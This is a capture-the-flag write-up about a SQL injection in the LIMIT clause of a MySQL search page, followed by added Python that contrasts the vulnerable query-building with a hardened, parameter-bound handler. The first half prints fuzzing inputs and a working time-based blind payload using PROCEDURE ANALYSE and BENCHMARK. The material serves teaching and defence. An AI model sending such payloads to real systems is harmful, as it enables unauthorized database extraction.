Web 100


Web100: sju:pe search engines

A very basic search web page :3


Try a search; the POST request gives a result like this:
keyword=superfish&limit=2&find=Submit+Query
OK, first I tried fuzzing SQLi into keyword, specifically:
+ keyword=superfish--
+ keyword=superfish--
+ keyword=superfish)--
+ keyword=superfish)--
No results came back, so I guessed this field is filtered with the function
mysql_real_escape_string.
Moving on.
Fuzz limit:
+ limit=2 -- - => OK
+ limit=100 => OK
+ limit=2,1 => OK
+ limit= 2 offset 0 => OK
... of the author; the injection must surely be here.
From experience, SQLi in LIMIT comes in two forms: one uses SELECT CASE / IF ELSE,
the other uses UNION-based SQLi, but neither worked. So off to visit
uncle Google then.
After a while of wrestling with uncle Google, I finally got results :chaymau:
To solve this challenge I used the time-based blind method combined with
PROCEDURE ANALYSE:
Reference: https://rateip.com/blog/sql-injections-in-mysql-limit-clause/
OK, let's give it a try
keyword=superfish&limit=1,1 PROCEDURE analyse((select
extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5,
BENCHMARK(5000000,SHA1(1)),1))))),1)&find=Submit+Query

Alt + X (HackBar, for those who don't know) and hold up your fingers to count, 1->2->3->4->5


->bingo!
OK, now just blind it:
<This is a quick-and-dirty Python script that only works for this challenge>
http://pastebin.com/g7cv7xXd
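The root cause of the challenge above is a LIMIT value concatenated straight into the query while only keyword is escaped: mysql_real_escape_string cannot protect an unquoted numeric position, which is why every limit variant fuzzed above was accepted. The following Python is added here as an illustration and is not part of the write-up or of the challenge's code; it shows the concatenation pattern beside a hardened handler that parses limit strictly and binds it as a parameter. It uses an in-memory sqlite3 table with constructed sample rows in place of the challenge's MySQL database, and MAX_COUNT is a hypothetical application cap.

```python
import re
import sqlite3

# Constructed sample rows standing in for the challenge's post table.
SAMPLE_POSTS = ["superfish", "superfish adware", "other topic"]

# MySQL LIMIT accepts "count" or "offset,count"; accept only bare
# non-negative integers in exactly those two shapes and nothing else.
_LIMIT_RE = re.compile(r"^(\d{1,6})(?:,(\d{1,6}))?$")
MAX_COUNT = 100  # hypothetical application cap on rows per page


def parse_limit(raw):
    """Return (offset, count) or raise ValueError for anything that is not
    a plain 'N' or 'N,M'. Whitespace, comments, keywords and function calls
    all fail the regex, so they never reach the SQL string."""
    m = _LIMIT_RE.match(raw)
    if m is None:
        raise ValueError("rejected limit parameter: %r" % raw)
    if m.group(2) is None:
        offset, count = 0, int(m.group(1))
    else:
        offset, count = int(m.group(1)), int(m.group(2))
    return offset, min(count, MAX_COUNT)


def is_valid_limit(raw):
    """Boolean wrapper around parse_limit for quick checks."""
    try:
        parse_limit(raw)
        return True
    except ValueError:
        return False


def unsafe_sql(escaped_keyword, raw_limit):
    """The pattern the write-up exploits: the keyword is escaped, but the
    LIMIT value is concatenated raw. Returned as a string only to show why
    escaping a quoted column does nothing for a bare numeric position;
    it is never executed here."""
    return ("SELECT title FROM posts WHERE title LIKE '%%%s%%' LIMIT %s"
            % (escaped_keyword, raw_limit))


def make_demo_db():
    """In-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (title TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?)",
                     [(t,) for t in SAMPLE_POSTS])
    return conn


def search(conn, keyword, raw_limit):
    """Hardened handler: validate limit first, then bind every value,
    including LIMIT and OFFSET, as query parameters."""
    offset, count = parse_limit(raw_limit)
    sql = ("SELECT title FROM posts WHERE title LIKE ? "
           "ORDER BY title LIMIT ? OFFSET ?")
    pattern = "%" + keyword + "%"  # LIKE wildcards in keyword only widen the match
    return [row[0] for row in conn.execute(sql, (pattern, count, offset))]


if __name__ == "__main__":
    db = make_demo_db()
    for raw in ["2", "2,1", "2 -- -", "2,1 PROCEDURE analyse(1,1)", " 2 offset 0"]:
        print("%-30r valid=%s" % (raw, is_valid_limit(raw)))
    print(search(db, "superfish", "2"))
```

The strict regex is deliberately narrower than what MySQL itself would parse: rejecting whitespace and any non-digit character means the only way to influence the query is through two small integers, and binding them as parameters removes the string-building step entirely. If you must keep a legacy string-built query, casting with int() before concatenation achieves the same effect for this one position.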
